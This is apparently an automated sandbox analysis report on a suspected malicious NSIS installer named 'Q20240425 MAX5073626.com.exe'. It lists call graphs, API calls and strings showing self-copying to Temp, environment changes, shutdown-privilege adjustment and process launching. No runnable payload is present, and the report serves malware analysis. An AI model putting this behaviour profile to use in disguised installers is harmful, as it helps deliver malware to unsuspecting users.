406467 3234 406b5c 3 API calls 3232->3234 3233 40641a lstrcpyA 3235 40642c 3233->3235 3234->3235 3236 40643d SetFilePointer 3235->3236 3237 406a31 WriteFile 3236->3237 3238 406454 GlobalFree 3237->3238 3238->3226 3239->3218 3240->3224 3242 406b7b 3241->3242 3243 406416 3241->3243 3242->3243 3244 406ba8 lstrlenA 3242->3244 3243->3232 3243->3233 3244->3242 3244->3243 3245 402566 3246 402574 3245->3246 3247 40256e 3245->3247 3249 402585 3246->3249 3251 40303e 21 API calls 3246->3251 3248 40303e 21 API calls 3247->3248 3248->3246 3250 402594 3249->3250 3252 40303e 21 API calls 3249->3252 3253 40303e 21 API calls 3250->3253 3251->3249 3252->3250 3254 40259d WritePrivateProfileStringW 3253->3254 3989 404f68 3990 404f74 3989->3990 3991 404f8c 3989->3991 3999 406a60 GetDlgItemTextW 3990->3999 3993 404fc0 3991->3993 3994 404f92 SHGetPathFromIDListW 3991->3994 3995 404fa2 3994->3995 3996 404f81 SendMessageW 3994->3996 3998 401533 91 API calls 3995->3998 3996->3993 3998->3996 3999->3996 4000 402d69 4001 403002 21 API calls 4000->4001 4002 402d6f 4001->4002 4003 401709 4002->4003 4004 405ece 21 API calls 4002->4004 4004->4003 4005 401eea 4006 401ef4 4005->4006 4007 401efe GetDlgItem 4005->4007 4008 403002 21 API calls 4006->4008 4009 401efb 4007->4009 4008->4009 4010 401f3c GetClientRect LoadImageW SendMessageW 4009->4010 4011 40303e 21 API calls 4009->4011 4013 401f9c 4010->4013 4015 401fa7 4010->4015 4011->4010 4014 401fa0 DeleteObject 4013->4014 4013->4015 4014->4015 4016 40216c 4017 40303e 21 API calls 4016->4017 4018 402173 4017->4018 4019 4065f5 2 API calls 4018->4019 4020 402179 4019->4020 4021 402188 4020->4021 4023 406645 wsprintfW 4020->4023 4023->4021 4024 401aec 4025 401aa2 4024->4025 4028 401ab1 4024->4028 4026 40303e 21 API calls 4025->4026 4027 401aa7 4026->4027 4029 40673f 70 API calls 4027->4029 4029->4028 4030 401af0 4031 40303e 21 API calls 4030->4031 4032 401af7 lstrlenW 4031->4032 4034 401afd 4032->4034 4033 40303e 21 API calls 4033->4034 4034->4033 4036 402855 4034->4036 4037 406941 GetFileAttributesW CreateFileW 4034->4037 4037->4034 3384 402b75 3385 40303e 21 API calls 3384->3385 3386 402b7c FindFirstFileW 3385->3386 3387 402b90 3386->3387 3390 406645 wsprintfW 3387->3390 3389 402b67 3390->3389 4038 402af5 4039 402afc 4038->4039 4041 401709 4038->4041 4040 403002 21 API calls 4039->4040 4042 402b03 4040->4042 4043 402b10 SetFilePointer 4042->4043 4043->4041 4045 402b21 4043->4045 4044 403002 21 API calls 4044->4045 4045->4041 4045->4044 4046 402d10 4045->4046 4047 402d35 4046->4047 4048 402d25 4046->4048 4050 405ece 21 API calls 4047->4050 4049 403002 21 API calls 4048->4049 4049->4041 4050->4041 4051 402077 4052 40303e 21 API calls 4051->4052 4053 40207d 4052->4053 4054 40303e 21 API calls 4053->4054 4055 402086 4054->4055 4056 40303e 21 API calls 4055->4056 4057 40208f 4056->4057 4058 40303e 21 API calls 4057->4058 4059 402098 4058->4059 4060 405d6f 28 API calls 4059->4060 4061 4020a4 4060->4061 4068 406a19 ShellExecuteExW 4061->4068 4063 4020ea 4064 401709 4063->4064 4065 40653a 5 API calls 4063->4065 4066 402109 CloseHandle 4065->4066 4066->4064 4068->4063 4069 402e7c SendMessageW 4070 402e94 InvalidateRect 4069->4070 4071 402ea1 4069->4071 4070->4071 4072 403d7d 4073 403d88 4072->4073 4074 403d8c 4073->4074 4075 403d8f GlobalAlloc 4073->4075 4075->4074 3787 4025ff 3788 402608 3787->3788 3789 40262f 3787->3789 3790 4030c1 21 API calls 3788->3790 3791 40303e 21 API calls 3789->3791 3792 40260f 3790->3792 3793 402636 3791->3793 3794 402615 3792->3794 3796 402648 3792->3796 3799 40307c 3793->3799 3797 40303e 21 API calls 3794->3797 3798 40261c RegDeleteValueW RegCloseKey 3797->3798 3798->3796 3800 403089 3799->3800 3801 403090 3799->3801 3800->3796 3801->3800 3803 40141e 3801->3803 3804 4062fe RegOpenKeyExW 3803->3804 3805 40145b 3804->3805 3806 401463 3805->3806 3807 401527 3805->3807 3808 40146f RegEnumValueW 3806->3808 3815 401493 3806->3815 3807->3800 3809 401503 RegCloseKey 3808->3809 3808->3815 3809->3807 3810 4014ce RegEnumKeyW 3811 4014d8 RegCloseKey 3810->3811 3810->3815 3812 40690c 5 API calls 3811->3812 3814 4014e9 3812->3814 3813 40141e 6 API calls 3813->3815 3816 401514 3814->3816 3817 4014ed RegDeleteKeyW 3814->3817 3815->3809 3815->3810 3815->3811 3815->3813 3816->3807 3817->3807 4076 401000 4077 401039 BeginPaint GetClientRect 4076->4077 4078 40100a DefWindowProcW 4076->4078 4079 40110f 4077->4079 4081 40119a 4078->4081 4082 401117 4079->4082 4083 40107e CreateBrushIndirect FillRect DeleteObject 4079->4083 4084 401185 EndPaint 4082->4084 4085 40111d CreateFontIndirectW 4082->4085 4083->4079 4084->4081 4085->4084 4086 401130 6 API calls 4085->4086 4086->4084 2847 401d01 2852 401d0f 2847->2852 2854 401d5d 2847->2854 2848 401d67 2856 401709 2848->2856 2884 406b40 lstrcpynW 2848->2884 2849 401d8c GlobalAlloc 2864 405ece 2849->2864 2850 401d50 2851 405ece 21 API calls 2850->2851 2851->2854 2852->2850 2857 401d1e 2852->2857 2854->2848 2854->2849 2881 406b40 lstrcpynW 2857->2881 2858 401d79 GlobalFree 2858->2856 2860 401d2d 2882 406b40 lstrcpynW 2860->2882 2862 401d3c 2883 406b40 lstrcpynW 2862->2883 2879 405ed9 2864->2879 2865 406124 2866 406139 2865->2866 2907 406b40 lstrcpynW 2865->2907 2866->2856 2868 4060ef lstrlenW 2868->2879 2869 405fef GetSystemDirectoryW 2869->2879 2871 405ece 15 API calls 2871->2868 2872 406005 GetWindowsDirectoryW 2872->2879 2875 405ece 15 API calls 2875->2879 2877 40609a lstrcatW 2877->2879 2879->2865 2879->2868 2879->2869 2879->2871 2879->2872 2879->2875 2879->2877 2880 406065 SHGetPathFromIDListW CoTaskMemFree 2879->2880 2885 40699d 2879->2885 2890 40690c GetModuleHandleA 2879->2890 2896 406645 wsprintfW 2879->2896 2897 406b40 lstrcpynW 2879->2897 2898 406d63 2879->2898 2880->2879 2881->2860 2882->2862 2883->2856 2884->2858 2908 4062fe 2885->2908 2888 4069d2 RegQueryValueExW RegCloseKey 2889 406a03 2888->2889 2889->2879 2891 406924 2890->2891 2892 40692e GetProcAddress 2890->2892 2912 4061c4 GetSystemDirectoryW 2891->2912 2894 40693c 2892->2894 2894->2879 2895 40692a 2895->2892 2895->2894 2896->2879 2897->2879 2905 406d78 2898->2905 2899 406e02 CharPrevW 2901 406dfa 2899->2901 2900 406deb CharNextW 2900->2901 2900->2905 2901->2899 2902 406e22 2901->2902 2902->2879 2904 406dd7 CharNextW 2904->2905 2905->2900 2905->2901 2905->2904 2906 406de6 CharNextW 2905->2906 2915 40661c 2905->2915 2906->2900 2907->2866 2909 40630d 2908->2909 2910 406311 2909->2910 2911 406316 RegOpenKeyExW 2909->2911 2910->2888 2910->2889 2911->2910 2913 4061e6 wsprintfW LoadLibraryExW 2912->2913 2913->2895 2916 406642 2915->2916 2917 406628 2915->2917 2916->2905 2917->2916 2918 406631 CharNextW 2917->2918 2918->2916 2918->2917 4087 401b03 4088 403002 21 API calls 4087->4088 4089 401b0a 4088->4089 4090 403002 21 API calls 4089->4090 4091 401b15 4090->4091 4092 40303e 21 API calls 4091->4092 4093 401b20 lstrlenW 4092->4093 4094 401b3c 4093->4094 4095 401b67 4093->4095 4094->4095 4099 406b40 lstrcpynW 4094->4099 4097 401b5b 4097->4095 4098 401b5f lstrlenW 4097->4098 4098->4095 4099->4097 4100 401c04 4101 403002 21 API calls 4100->4101 4102 401c0e 4101->4102 4103 403002 21 API calls 4102->4103 4104 401bb2 4103->4104 4105 405905 4106 40591a 4105->4106 4107 40592e 4105->4107 4108 405920 4106->4108 4109 405973 CallWindowProcW 4106->4109 4110 405936 IsWindowVisible 4107->4110 4113 40594d 4107->4113 4111 40551d SendMessageW 4108->4111 4114 40592a 4109->4114 4110->4109 4112 405943 4110->4112 4111->4114 4115 40570f 5 API calls 4112->4115 4113->4109 4116 4054eb 91 API calls 4113->4116 4115->4113 4116->4109 4117 401b88 4118 40303e 21 API calls 4117->4118 4119 401b8f 4118->4119 4120 40303e 21 API calls 4119->4120 4121 401b98 4120->4121 4122 401ba0 lstrcmpiW 4121->4122 4123 401ba8 lstrcmpW 4121->4123 4124 401bae 4122->4124 4123->4124 4125 40568a lstrcpynW lstrlenW 4126 401e8e 4127 403002 21 API calls 4126->4127 4128 401e94 IsWindow 4127->4128 4129 401bb2 4128->4129 3718 406a19 ShellExecuteExW 3741 40211b 3742 40303e 21 API calls 3741->3742 3743 402121 3742->3743 3744 405d6f 28 API calls 3743->3744 3745 40212b 3744->3745 3746 4066fc 2 API calls 3745->3746 3747 402131 3746->3747 3748 40215b 3747->3748 3752 401709 3747->3752 3754 40653a WaitForSingleObject 3747->3754 3750 402110 CloseHandle 3748->3750 3748->3752 3750->3752 3751 40214b 3751->3748 3759 406645 wsprintfW 3751->3759 3755 406551 3754->3755 3756 406567 GetExitCodeProcess 3755->3756 3757 406235 2 API calls 3755->3757 3756->3751 3758 406558 WaitForSingleObject 3757->3758 3758->3755 3759->3748 4130 40291d 4131 403002 21 API calls 4130->4131 4141 40292e 4131->4141 4132 402aee 4133 402aa2 SetFilePointer 4135 402980 ReadFile 4135->4133 4135->4141 4136 40696e ReadFile 4136->4141 4137 4064aa 5 API calls 4137->4141 4138 402ae4 4143 406645 wsprintfW 4138->4143 4139 4029c5 MultiByteToWideChar 4139->4141 4141->4132 4141->4133 4141->4135 4141->4136 4141->4137 4141->4138 4141->4139 4142 4029f6 SetFilePointer MultiByteToWideChar 4141->4142 4142->4141 4143->4132 4144 40219d 4145 40303e 21 API calls 4144->4145 4146 4021a4 4145->4146 4147 40690c 5 API calls 4146->4147 4148 4021b5 4147->4148 4149 402ea5 4148->4149 4150 4021ce GlobalAlloc 4148->4150 4150->4149 4151 4021e3 4150->4151 4152 40690c 5 API calls 4151->4152 4153 4021ea 4152->4153 4154 40690c 5 API calls 4153->4154 4155 4021f3 4154->4155 4156 40224e GlobalFree 4155->4156 4161 406645 wsprintfW 4155->4161 4156->4149 4158 402237 4162 406645 wsprintfW 4158->4162 4160 40224c 4160->4156 4161->4158 4162->4160 4163 404f21 4164 404f31 4163->4164 4165 404f57 4163->4165 4167 40554f 22 API calls 4164->4167 4166 405790 8 API calls 4165->4166 4168 404f63 4166->4168 4169 404f3e SetDlgItemTextW 4167->4169 4169->4165 4170 401aa1 4171 401aa2 4170->4171 4172 40303e 21 API calls 4171->4172 4173 401aa7 4172->4173 4174 40673f 70 API calls 4173->4174 4175 401ab1 4174->4175 4176 402ba3 4177 40303e 21 API calls 4176->4177 4178 402bb2 4177->4178 4179 402bc9 4178->4179 4180 40303e 21 API calls 4178->4180 4181 406bc3 2 API calls 4179->4181 4180->4179 4182 402bcf 4181->4182 4204 406941 GetFileAttributesW CreateFileW 4182->4204 4184 402bdc 4185 402cb7 4184->4185 4186 402c9f 4184->4186 4187 402bfd GlobalAlloc 4184->4187 4188 402cc0 DeleteFileW 4185->4188 4189 402ccf 4185->4189 4191 403148 39 API calls 4186->4191 4187->4186 4190 402c1d 4187->4190 4188->4189 4205 403131 SetFilePointer 4190->4205 4193 402cac CloseHandle 4191->4193 4193->4185 4194 402c23 4195 40311b ReadFile 4194->4195 4196 402c2d GlobalAlloc 4195->4196 4197 402c43 4196->4197 4198 402c84 4196->4198 4200 403148 39 API calls 4197->4200 4199 406a31 WriteFile 4198->4199 4201 402c93 GlobalFree 4199->4201 4203 402c52 4200->4203 4201->4186 4202 402c7a GlobalFree 4202->4198 4203->4202 4204->4184 4205->4194 3334 402728 3345 4030c1 3334->3345 3337 40303e 21 API calls 3338 40273b 3337->3338 3339 402748 RegQueryValueExW 3338->3339 3341 401709 3338->3341 3340 40276b 3339->3340 3344 402772 3339->3344 3340->3344 3350 406645 wsprintfW 3340->3350 3342 40271c RegCloseKey 3342->3341 3344->3341 3344->3342 3346 40303e 21 API calls 3345->3346 3347 4030d9 3346->3347 3348 4062fe RegOpenKeyExW 3347->3348 3349 402732 3348->3349 3349->3337 3350->3344 4206 402b28 4207 402b2e 4206->4207 4208 402b36 FindClose 4207->4208 4209 402ea1 4207->4209 4208->4209 4210 40362a 4211 403650 4210->4211 4212 40363c SetTimer 4210->4212 4213 403659 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4211->4213 4214 4036a7 4211->4214 4212->4213 4213->4214 3351 4025ac 3352 40303e 21 API calls 3351->3352 3353 4025bd 3352->3353 3354 40303e 21 API calls 3353->3354 3355 4025c6 3354->3355 3356 40303e 21 API calls 3355->3356 3357 4025cf GetPrivateProfileStringW 3356->3357 3358 4025f4 3357->3358 4215 401ead 4216 403002 21 API calls 4215->4216 4217 401eb4 4216->4217 4218 403002 21 API calls 4217->4218 4219 401ebd GetDlgItem 4218->4219 3375 4027b0 3376 4030c1 21 API calls 3375->3376 3377 4027ba 3376->3377 3378 403002 21 API calls 3377->3378 3379 4027c3 3378->3379 3380 4027f0 RegEnumValueW 3379->3380 3381 4027e4 RegEnumKeyW 3379->3381 3382 401709 3379->3382 3383 40280e RegCloseKey 3380->3383 3381->3383 3383->3382 4220 401ab6 4221 40303e 21 API calls 4220->4221 4222 401abd 4221->4222 4223 406ace MessageBoxIndirectW 4222->4223 4224 401709 4223->4224 4225 402837 4226 40303e 21 API calls 4225->4226 4229 401afd 4226->4229 4228 402855 4229->4225 4229->4228 4230 406941 GetFileAttributesW CreateFileW 4229->4230 4230->4229 4231 401fb8 GetDC 4232 403002 21 API calls 4231->4232 4233 401fc8 GetDeviceCaps MulDiv ReleaseDC 4232->4233 4234 403002 21 API calls 4233->4234 4235 401ff8 4234->4235 4236 405ece 21 API calls 4235->4236 4237 402032 CreateFontIndirectW 4236->4237 3719 401dba 3720 403002 21 API calls 3719->3720 3721 401dc1 3720->3721 3722 403002 21 API calls 3721->3722 3723 401dce 3722->3723 3724 401de1 3723->3724 3725 40303e 21 API calls 3723->3725 3726 401df6 3724->3726 3727 40303e 21 API calls 3724->3727 3725->3724 3728 401e50 3726->3728 3729 401e01 3726->3729 3727->3726 3730 40303e 21 API calls 3728->3730 3731 403002 21 API calls 3729->3731 3733 401e55 3730->3733 3732 401e06 3731->3732 3734 403002 21 API calls 3732->3734 3735 40303e 21 API calls 3733->3735 3736 401e11 3734->3736 3737 401e5e FindWindowExW 3735->3737 3738 401e41 SendMessageW 3736->3738 3739 401e1e SendMessageTimeoutW 3736->3739 3740 401e7b 3737->3740 3738->3740 3739->3740 4238 4040ba 4239 4040e1 4238->4239 4240 4040f7 4238->4240 4299 406a60 GetDlgItemTextW 4239->4299 4242 404101 GetDlgItem 4240->4242 4249 404174 4240->4249 4244 404119 4242->4244 4243 4040ec 4246 406d63 5 API calls 4243->4246 4247 40412d SetWindowTextW 4244->4247 4250 406beb 4 API calls 4244->4250 4245 404193 4274 4040f2 4245->4274 4301 406a60 GetDlgItemTextW 4245->4301 4246->4274 4251 40554f 22 API calls 4247->4251 4249->4245 4253 405ece 21 API calls 4249->4253 4256 404123 4250->4256 4257 40414a 4251->4257 4252 40428a 4258 40665e 18 API calls 4252->4258 4254 4041ef SHBrowseForFolderW 4253->4254 4254->4245 4261 40420a CoTaskMemFree 4254->4261 4255 405790 8 API calls 4262 40444b 4255->4262 4256->4247 4266 40657c 3 API calls 4256->4266 4259 40554f 22 API calls 4257->4259 4260 404290 4258->4260 4263 404155 4259->4263 4302 406b40 lstrcpynW 4260->4302 4265 40657c 3 API calls 4261->4265 4300 405538 SendMessageW 4263->4300 4269 404217 4265->4269 4266->4247 4268 4042aa 4271 40690c 5 API calls 4268->4271 4272 404254 SetDlgItemTextW 4269->4272 4276 405ece 21 API calls 4269->4276 4270 40415b 4273 40690c 5 API calls 4270->4273 4282 4042b0 4271->4282 4272->4245 4273->4274 4274->4255 4275 404305 4303 406b40 lstrcpynW 4275->4303 4278 404235 lstrcmpiW 4276->4278 4278->4272 4280 404249 lstrcatW 4278->4280 4279 404311 4281 406beb 4 API calls 4279->4281 4280->4272 4283 404317 GetDiskFreeSpaceW 4281->4283 4282->4275 4286 406d36 2 API calls 4282->4286 4288 40435f 4282->4288 4285 40433f MulDiv 4283->4285 4283->4288 4285->4288 4286->4282 4287 4043d6 4290 4043fe EnableWindow 4287->4290 4292 401533 91 API calls 4287->4292 4288->4287 4289 405595 24 API calls 4288->4289 4291 4043be 4289->4291 4290->4274 4293 404427 4290->4293 4294 4043c2 4291->4294 4295 4043d8 SetDlgItemTextW 4291->4295 4296 4043fc 4292->4296 4293->4274 4304 405571 SendMessageW 4293->4304 4298 405595 24 API calls 4294->4298 4295->4287 4296->4290 4298->4287 4299->4243 4300->4270 4301->4252 4302->4268 4303->4279 4304->4274 4305 401bbb 4306 40303e 21 API calls 4305->4306 4307 401bc4 ExpandEnvironmentStringsW 4306->4307 4308 401bd7 4307->4308 4310 401be9 4307->4310 4309 401bdd lstrcmpW 4308->4309 4308->4310 4309->4310 4311 403dbf 4312 403dd4 4311->4312 4313 403ef9 4311->4313 4315 40554f 22 API calls 4312->4315 4314 403f7a 4313->4314 4318 403f07 4313->4318 4316 403f75 4314->4316 4317 403f85 GetDlgItem 4314->4317 4320 403e43 4315->4320 4319 405790 8 API calls 4316->4319 4321 403fa7 4317->4321 4322 404048 4317->4322 4318->4316 4325 403f34 GetDlgItem SendMessageW EnableWindow 4318->4325 4323 40408d 4319->4323 4324 40554f 22 API calls 4320->4324 4321->4316 4328 403fd7 SendMessageW LoadCursorW SetCursor 4321->4328 4322->4316 4329 404059 4322->4329 4327 403e52 CheckDlgButton EnableWindow GetDlgItem 4324->4327 4340 405571 SendMessageW 4325->4340 4339 405538 SendMessageW 4327->4339 4341 406a19 ShellExecuteExW 4328->4341 4332 404061 SendMessageW 4329->4332 4333 404078 4329->4333 4332->4333 4333->4323 4336 40407d SendMessageW 4333->4336 4334 403e85 SendMessageW 4337 403ea1 GetSysColor 4334->4337 4338 403eaa SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4334->4338 4335 40403a LoadCursorW SetCursor 4335->4322 4336->4323 4337->4338 4338->4323 4339->4334 4340->4316 4341->4335

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 4036d7-403720 SetErrorMode GetVersionExW 1 403722-403742 GetVersionExW 0->1 2 403759 0->2 3 403744-403748 1->3 4 403755-403757 1->4 5 403760-403765 2->5 6 40374b-403753 3->6 4->6 7 403772 5->7 8 403767-403770 5->8 6->5 9 403776-4037b8 7->9 8->9 10 4037ba-4037c2 call 40690c 9->10 11 4037cb 9->11 10->11 17 4037c4 10->17 12 4037d0-4037e2 call 4061c4 lstrlenA 11->12 18 4037e4-403800 call 40690c * 3 12->18 17->11 25 403811-4038aa #17 OleInitialize SHGetFileInfoW call 406b40 GetCommandLineW call 406b40 call 40661c CharNextW 18->25 26 403802-403808 18->26 35 4038b0 25->35 36 40398c-4039a5 GetTempPathW call 403cda 25->36 26->25 31 40380a 26->31 31->25 38 4038b2-4038bb 35->38 42 403a12-403a27 DeleteFileW call 4033c8 36->42 43 4039a7-4039cd GetWindowsDirectoryW lstrcatW call 403cda 36->43 40 4038c8-4038d5 38->40 41 4038bd-4038c6 38->41 44 4038e0-4038ef 40->44 45 4038d7-4038de 40->45 41->40 41->41 59 403bf3 42->59 60 403a2d-403a33 42->60 43->42 57 4039cf-403a0c GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403cda 43->57 48 4038f1-4038fd 44->48 49 40394a-40395e call 40661c 44->49 45->44 53 403917-40391d 48->53 54 4038ff-403906 48->54 67 403960-403963 49->67 68 403966-40396c 49->68 55 403939-403940 53->55 56 40391f-403926 53->56 61 403908-40390b 54->61 62 40390d 54->62 55->49 64 403942-403948 55->64 56->55 63 403928-40392f 56->63 57->42 57->59 66 403bf7 59->66 69 403a35-403a49 call 40661c 60->69 70 403a9a-403aa1 call 405a73 60->70 61->53 61->62 62->53 71 403931-403934 63->71 72 403936 63->72 64->49 73 403974-403983 call 406b40 64->73 75 403bf9-403c06 call 4036ad OleUninitialize 66->75 67->68 68->38 76 403972 68->76 84 403a5f-403a61 69->84 80 403aa6-403aa8 70->80 71->55 71->72 72->55 82 403988 73->82 88 403c41-403c48 75->88 89 403c08-403c13 call 406ace 75->89 76->82 80->66 82->36 86 403a63-403a6a 84->86 87 403a4b-403a51 84->87 94 403a6c-403a7c call 40665e 86->94 95 403aad-403ad4 call 406522 lstrlenW call 406b40 86->95 90 403a53-403a5a 87->90 91 403a5c 87->91 92 403cc6-403cd5 88->92 93 403c4a-403c60 GetCurrentProcess OpenProcessToken 88->93 97 403c15 ExitProcess 89->97 90->86 90->91 91->84 92->97 99 403c62-403c90 LookupPrivilegeValueW AdjustTokenPrivileges 93->99 100 403c96-403ca4 call 40690c 93->100 108 403a82-403a98 call 406b40 * 2 94->108 109 403c3d-403c3f 94->109 114 403ae5-403aef 95->114 115 403ad6-403ae0 call 406b40 95->115 99->100 111 403cb2-403cbd ExitWindowsEx 100->111 112 403ca6-403cb0 100->112 108->70 109->66 111->92 117 403cbf-403cc1 call 401533 111->117 112->111 112->117 119 403af3-403af5 114->119 115->114 117->92 123 403af8-403b27 wsprintfW call 405ece 119->123 127 403b30 call 405e53 123->127 128 403b29-403b2e call 405e73 123->128 131 403b35-403b37 127->131 128->131 133 403b82-403bad SetCurrentDirectoryW call 406263 CopyFileW 131->133 134 403b39-403b49 GetFileAttributesW 131->134 133->59 142 403baf-403bdc call 406263 call 405ece call 4066fc 133->142 135 403c1b-403c26 134->135 136 403b4f-403b5c DeleteFileW 134->136 135->119 138 403c2c 135->138 136->135 139 403b62-403b73 call 40673f 136->139 138->59 139->135 145 403b79-403b7d 139->145 151 403c2e-403c3b CloseHandle 142->151 152 403bde-403be3 142->152 145->123 151->75 152->59 153 403be5-403bf1 call 4065f5 152->153 153->59 153->145
                          APIs
                          • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                          • GetVersionExW.KERNEL32 ref: 0040371C
                          • GetVersionExW.KERNEL32(?), ref: 0040372F
                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                          • #17.COMCTL32(00000008,0000000A,0000000C), ref: 00403811
                          • OleInitialize.OLE32(00000000), ref: 00403818
                          • SHGetFileInfoW.SHELL32(004085A8,00000000,?,000002B4,00000000), ref: 00403837
                          • GetCommandLineW.KERNEL32(00428520,NSIS Error), ref: 0040384C
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",?,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000), ref: 00403896
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039B1
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C1
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039D9
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E6
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039F7
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403A03
                            • Part of subcall function 00406B40: lstrcpynW.KERNEL32(?,?,00000400,0040384C,00428520,NSIS Error), ref: 00406B4D
                          • DeleteFileW.KERNELBASE(1033), ref: 00403A17
                            • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                            • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,00000400,?,?,?,?,?), ref: 004033F7
                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000,00000000), ref: 00403ABB
                          • wsprintfW.USER32 ref: 00403AFF
                          • GetFileAttributesW.KERNEL32(Pata c",C:\Users\user\AppData\Local\Temp\), ref: 00403B3E
                          • DeleteFileW.KERNEL32(Pata c"), ref: 00403B54
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B87
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe,Pata c",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403BA5
                            • Part of subcall function 004065F5: FindFirstFileW.KERNELBASE(00000000,00426E68,00000000,004066A2,00425268), ref: 00406600
                            • Part of subcall function 004065F5: FindClose.KERNEL32(00000000), ref: 0040660C
                          • OleUninitialize.OLE32(00000000), ref: 00403BFE
                          • ExitProcess.KERNEL32 ref: 00403C15
                          • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,Pata c",00000000), ref: 00403C2F
                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403C51
                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403C58
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C6D
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C90
                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403CB5
                            • Part of subcall function 0040661C: CharNextW.USER32(?,00403895,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",?,"C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe",00000000), ref: 00406632
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1662473901.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1662458729.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662558315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662577020.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1662769420.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Q20240425 MAX5073626.jbxd
                          Similarity
                          • API ID: File$Process$CharCloseCurrentDeleteDirectoryEnvironmentExitFindNextPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCommandCopyCountErrorFirstHandleInfoInitializeLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcpynwsprintf
                          • String ID: "C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe"$1033$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest$C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$Pata c"$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                          • API String ID: 1265021196-63840726
                          • Opcode ID: 6e72c599556f6d53e7c8a7d6e71ce980aa4490f250c8596acaa94938f6b8808a
                          • Instruction ID: c0b1d9e646d8e221ab378427d31961f808d9ea5217b01dbc056974715919ac4b
                          • Opcode Fuzzy Hash: 6e72c599556f6d53e7c8a7d6e71ce980aa4490f250c8596acaa94938f6b8808a
                          • Instruction Fuzzy Hash: 48E12770204311BAD7207F619D46B2B3AE8AB4874AF51443FF582F62D1DBBC9E01876D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 156 404b65-404b7c 157 404b82-404c50 GetDlgItem * 3 call 405538 call 40586a GetClientRect GetSystemMetrics SendMessageW * 2 156->157 158 404d0e-404d14 156->158 180 404c52-404c64 SendMessageW * 2 157->180 181 404c66-404c6c 157->181 160 404d16-404d3c GetDlgItem CreateThread FindCloseChangeNotification 158->160 161 404d5a-404d60 158->161 163 404d42-404d4b call 405790 160->163 164 404d62-404d6c 161->164 165 404d8b-404d91 161->165 174 404d50-404d57 163->174 164->163 170 404d6e-404d89 ShowWindow * 2 call 405538 164->170 166 404d93-404d9a 165->166 167 404dd9-404ddc 165->167 171 404d9c-404da6 166->171 172 404daf-404dc4 ShowWindow 166->172 167->163 175 404de2-404de6 167->175 170->163 177 404da8-404dad call 40598d 171->177 178 404dd5-404dd7 172->178 179 404dc6-404dd0 call 405d6f 172->179 175->163 182 404dec-404e04 SendMessageW 175->182 177->163 